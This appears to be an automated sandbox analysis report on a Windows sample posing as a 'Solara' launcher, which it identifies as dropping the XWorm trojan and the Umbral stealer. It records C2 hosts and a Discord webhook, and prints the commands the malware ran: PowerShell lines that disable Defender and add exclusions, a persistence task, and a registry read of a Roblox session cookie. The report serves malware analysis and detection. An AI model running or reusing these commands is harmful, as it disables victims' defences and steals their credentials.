Analysis

  • max time kernel
    150s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250217-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system
  • submitted
    04/03/2025, 11:47

General

  • Target

    BootstrapperNew.exe

  • Size

    2.9MB

  • MD5

    a5da11e4a285848ae515180014f45b31

  • SHA1

    a9a3831a17d602f2aa1c2adf91328a1b639efe51

  • SHA256

    f3e50131ad394cee77a2f242e521a30662bbfb670a459e151fea8916ca0c9bfa

  • SHA512

    8d6bd11c484f967a79a9a5f07ed2e2fc5fba768e963de87d772fe1702a643f775641422f5399fa8a94e0c6ccaadfc7c690620fb72dfffb7e62d31aabbfb8a8ec

  • SSDEEP

    49152:8NRJ4Dffl1NvzVQi91k3oTiQ+j07CM3hJfUNeGU76VNHYYO6gpls53NMCHoX:iqDfHtzi41HTJ+j0OofUNW767zgplK

Malware Config

Extracted

Family

xworm

Version

5.0

C2

127.0.0.1:36623

fax-scenarios.gl.at.ply.gg:36623

Mutex

iq4Cbvqxc9yxmDW5

Attributes
  • Install_directory

    %AppData%

  • install_file

    svchost.exe

aes.plain

Extracted

Family

umbral

C2

https://discord.com/api/webhooks/1345563602677141726/UETQM4AWjNBFBxXdR-mv-F7ECuO_Z-OofyNnLI5dWrFHlsYv4cmGa1-zg2Y-OdxgVf3d

Signatures

  • Detect Umbral payload 2 IoCs
  • Detect Xworm Payload 2 IoCs
  • Umbral

    Umbral stealer is an opensource moduler stealer written in C#.

  • Umbral family
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Xworm family
  • Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Drops file in Drivers directory 1 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 7 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 26 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 36 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
    "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
    1⤵
    • Adds Run key to start application
    • Suspicious use of WriteProcessMemory
    PID:1312
    • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Solara.exe
      C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Solara.exe
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:4824
      • C:\Users\Admin\AppData\Local\Temp\SolaraNew.exe
        "C:\Users\Admin\AppData\Local\Temp\SolaraNew.exe"
        3⤵
        • Executes dropped EXE
        PID:4896
      • C:\Users\Admin\AppData\Local\Temp\X.exe
        "C:\Users\Admin\AppData\Local\Temp\X.exe"
        3⤵
        • Checks computer location settings
        • Drops startup file
        • Executes dropped EXE
        • Adds Run key to start application
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:4448
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\X.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2336
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'X.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4824
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\svchost.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4220
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          PID:3012
        • C:\Windows\System32\schtasks.exe
          "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\svchost.exe"
          4⤵
          • Scheduled Task/Job: Scheduled Task
          PID:5100
    • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Config.exe
      C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Config.exe
      2⤵
      • Drops file in Drivers directory
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4388
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Config.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2200
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3540
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4960
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1120
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" os get Caption
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:1864
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" computersystem get totalphysicalmemory
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:3384
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" csproduct get uuid
        3⤵
          PID:1944
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          PID:3124
        • C:\Windows\System32\Wbem\wmic.exe
          "wmic" path win32_VideoController get name
          3⤵
          • Detects videocard installed
          PID:4016
    • C:\Users\Admin\AppData\Roaming\svchost.exe
      C:\Users\Admin\AppData\Roaming\svchost.exe
      1⤵
      • Executes dropped EXE
      PID:2860
    • C:\Users\Admin\AppData\Roaming\svchost.exe
      C:\Users\Admin\AppData\Roaming\svchost.exe
      1⤵
      • Executes dropped EXE
      PID:5004
    • C:\Users\Admin\AppData\Roaming\svchost.exe
      C:\Users\Admin\AppData\Roaming\svchost.exe
      1⤵
      • Executes dropped EXE
      PID:3552

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

      Filesize

      2KB

      MD5

      d85ba6ff808d9e5444a4b369f5bc2730

      SHA1

      31aa9d96590fff6981b315e0b391b575e4c0804a

      SHA256

      84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

      SHA512

      8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\svchost.exe.log

      Filesize

      654B

      MD5

      2ff39f6c7249774be85fd60a8f9a245e

      SHA1

      684ff36b31aedc1e587c8496c02722c6698c1c4e

      SHA256

      e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced

      SHA512

      1d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      948B

      MD5

      c9b6705519e1eef08f86c4ba5f4286f3

      SHA1

      6c6b179e452ecee2673a1d4fe128f1c06f70577f

      SHA256

      0f9cad44a79126871580e19b01dc3f880c5173b1faaf8b9018d5d1f829714705

      SHA512

      6d8f85a7a8b0b124530f36a157cd0441b5c1eacdc35e274af9fbf0569d03d1d5e468651a5b2425f0215c282ecfa7b1ffeaeeaf18612822f00bd14306d30640c7

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      1KB

      MD5

      276798eeb29a49dc6e199768bc9c2e71

      SHA1

      5fdc8ccb897ac2df7476fbb07517aca5b7a6205b

      SHA256

      cd0a1056e8f1b6cb5cb328532239d802f4e2aa8f8fcdc0fcb487684bd68e0dcc

      SHA512

      0d34fce64bbefc57d64fa6e03ca886952263d5f24df9c1c4cce6a1e8f5a47a9a21e9820f8d38caa7f7b43a52336ce00b738ea18419aaa7c788b72e04ce19e4f2

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      944B

      MD5

      c4b55b92c0efc1f6a722cf71ba47d887

      SHA1

      5f518b947dc5e54f429a29507ad0c2d3c279171f

      SHA256

      a562f112381c42ee10ec1c8e2cee1717f380950732f7242725105cfda8aaf42e

      SHA512

      567dca8909f3925adeac758ffc14aaf73a150ef8ebcbcd13f11459aaf609c080d43e1c394af3d0218c84f50f6e317fb66f4fd432d548f5c9bc0125c478319ae5

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      944B

      MD5

      9bc110200117a3752313ca2acaf8a9e1

      SHA1

      fda6b7da2e7b0175b391475ca78d1b4cf2147cd3

      SHA256

      c88e4bbb64f7fa31429ebe82c1cf07785c44486f37576f783a26ac856e02a4eb

      SHA512

      1f1af32aa18a8cbfcc65b0d4fb7e6ca2705f125eaa85789e981ee68b90c64522e954825abf460d4b4f97567715dfae8d9b0a25a4d54d10bc4c257c472f2e80fb

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      944B

      MD5

      04f1d68afbed6b13399edfae1e9b1472

      SHA1

      8bfdcb687a995e4a63a8c32df2c66dc89f91a8b0

      SHA256

      f358f33a42122e97c489fad7bbc8beab2eb42d42e4ec7fce0dd61fe6d8c0b8de

      SHA512

      30c5e72a8134992094d937d2588f7a503b1d6407d11afe0265b7c8b0ce14071925e5caed13fc4f9c28705df4c7aed3601f81b007048b148af274d7784aa5fb75

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      944B

      MD5

      47605a4dda32c9dff09a9ca441417339

      SHA1

      4f68c895c35b0dc36257fc8251e70b968c560b62

      SHA256

      e6254c2bc9846a76a4567ab91b6eae76e937307ff9301b65d577ffe6e15fe40a

      SHA512

      b6823b6e794a2fe3e4c4ecfb3f0d61a54821de7feb4f9e3e7fd463e7fbb5e6848f59865b487dafebeac431e4f4db81ef56836d94cac67da39852c566ed34a885

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      944B

      MD5

      77d622bb1a5b250869a3238b9bc1402b

      SHA1

      d47f4003c2554b9dfc4c16f22460b331886b191b

      SHA256

      f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb

      SHA512

      d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

    • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\CONFIG

      Filesize

      79B

      MD5

      0284fa0391784125ad3b12be8c92c6ae

      SHA1

      e4fe938288c6804d9c79947ad2e39939a595e9f3

      SHA256

      789075b8c810f2b63f86dd1f8b7be836178ac679a32f2cb2376e013bc78c68c0

      SHA512

      9dd8db4e0017ae906e7c4178a54ea16f03aaba4c17658ed96fc384d2cd51f44c6e514872ba5c7e5f43131eb4d25c063531291d70dfab4422260585742a37e235

    • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Config.exe

      Filesize

      227KB

      MD5

      92ed19b045602f46a7a1d88d048f519b

      SHA1

      b4bf7b8bb5d19a3551df6b383673bc2ef6e016c2

      SHA256

      71c0b202ad4a6843d28d13c4bccbd22f12cf48a21e9a5676ce18c98e53e5dd7e

      SHA512

      d4ee42e54fdc19bbb0fa5e6243fbd6f3c2d7c69e26826940a9dc2ff01c23f35d3ceb6f50a3f3b0dd9c565b4a336bd8c08aba4e37133bc2819a5007df7c7b0b59

    • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Solara.exe

      Filesize

      2.9MB

      MD5

      b48a98cac04ccfc5a1d2fba3afd546d7

      SHA1

      3bdacc3f96359cde0de585973529af246ecb1501

      SHA256

      a54874c76aeca3adbea14c50b07ffa3a5703fa021af7e02d130c980889b40ce7

      SHA512

      818d4c934ab9a5138c2cf74a0c638bec7fef552431fcd54c595a387f1d57703c3a5c4c5e11d5f95436728cb136743a3711bc0201344b5896ea1339ec73f849ee

    • C:\Users\Admin\AppData\Local\Temp\SolaraNew.exe

      Filesize

      2.9MB

      MD5

      f227cdfd423b3cc03bb69c49babf4da3

      SHA1

      3db5a97d9b0f2545e7ba97026af6c28512200441

      SHA256

      cb5d6c1ca0aa6232a2d55e14b20ac4a9945a0bd063c57d60a5ed3ae94160e3e8

      SHA512

      b10afd03b02a928545c16fad39a6ae46b68b1e1a2477a6990803ce80008e7161fb2ebc9380ba15a1b074bb436aa34bcd6c94a922933d438b1c22489717e1e10e

    • C:\Users\Admin\AppData\Local\Temp\X.exe

      Filesize

      44KB

      MD5

      d8dec448ddbb0749bbe3f4259c9bc29b

      SHA1

      93886a2b1c55fa6ff41ac5bce6945e601d355f8c

      SHA256

      56ef629323495497970ffe5efd4c3197bd8043825ba264b9e6294113675820ac

      SHA512

      20739296d87d15b801086a8e7478875722e83dc1fd4004e9905a1c6f8c0c8913644bcf7e5b7aecb760f4870354118fc10d218f952fcd7b204c1f0ebae4e4a400

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fiz5z2tg.uzx.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • memory/1312-0-0x0000000140000000-0x00000001402F9000-memory.dmp

      Filesize

      3.0MB

    • memory/1312-188-0x0000000140000000-0x00000001402F9000-memory.dmp

      Filesize

      3.0MB

    • memory/2200-51-0x000001C79D630000-0x000001C79D652000-memory.dmp

      Filesize

      136KB

    • memory/4388-79-0x0000021C79FE0000-0x0000021C7A056000-memory.dmp

      Filesize

      472KB

    • memory/4388-81-0x0000021C795C0000-0x0000021C795DE000-memory.dmp

      Filesize

      120KB

    • memory/4388-129-0x0000021C795B0000-0x0000021C795BA000-memory.dmp

      Filesize

      40KB

    • memory/4388-130-0x0000021C79F80000-0x0000021C79F92000-memory.dmp

      Filesize

      72KB

    • memory/4388-37-0x0000021C77810000-0x0000021C77850000-memory.dmp

      Filesize

      256KB

    • memory/4388-80-0x0000021C79E00000-0x0000021C79E50000-memory.dmp

      Filesize

      320KB

    • memory/4448-193-0x000000001D950000-0x000000001D95C000-memory.dmp

      Filesize

      48KB

    • memory/4448-38-0x0000000000810000-0x0000000000822000-memory.dmp

      Filesize

      72KB

    • memory/4824-9-0x0000000000C30000-0x0000000000F22000-memory.dmp

      Filesize

      2.9MB

    • memory/4824-8-0x00007FFFB0913000-0x00007FFFB0915000-memory.dmp

      Filesize

      8KB

    • memory/4896-55-0x00000261CAA80000-0x00000261CAA8A000-memory.dmp

      Filesize

      40KB

    • memory/4896-39-0x00007FFFB0910000-0x00007FFFB13D1000-memory.dmp

      Filesize

      10.8MB

    • memory/4896-53-0x00000261CAA70000-0x00000261CAA7E000-memory.dmp

      Filesize

      56KB

    • memory/4896-61-0x00000261CB260000-0x00000261CB268000-memory.dmp

      Filesize

      32KB

    • memory/4896-34-0x00000261AC480000-0x00000261AC762000-memory.dmp

      Filesize

      2.9MB

    • memory/4896-60-0x00000261CAA90000-0x00000261CAA9A000-memory.dmp

      Filesize

      40KB

    • memory/4896-56-0x00000261CAAE0000-0x00000261CAB06000-memory.dmp

      Filesize

      152KB

    • memory/4896-54-0x00000261CB130000-0x00000261CB230000-memory.dmp

      Filesize

      1024KB

    • memory/4896-59-0x00000261CAB10000-0x00000261CAB1A000-memory.dmp

      Filesize

      40KB

    • memory/4896-57-0x00000261CAB20000-0x00000261CAB28000-memory.dmp

      Filesize

      32KB

    • memory/4896-40-0x00000261ACB40000-0x00000261ACB50000-memory.dmp

      Filesize

      64KB

    • memory/4896-52-0x00000261CAAA0000-0x00000261CAAD8000-memory.dmp

      Filesize

      224KB

    • memory/4896-189-0x00007FFFB0910000-0x00007FFFB13D1000-memory.dmp

      Filesize

      10.8MB

    • memory/4896-58-0x00000261CB230000-0x00000261CB246000-memory.dmp

      Filesize

      88KB

    • memory/4896-41-0x00000261CA8D0000-0x00000261CA8D8000-memory.dmp

      Filesize

      32KB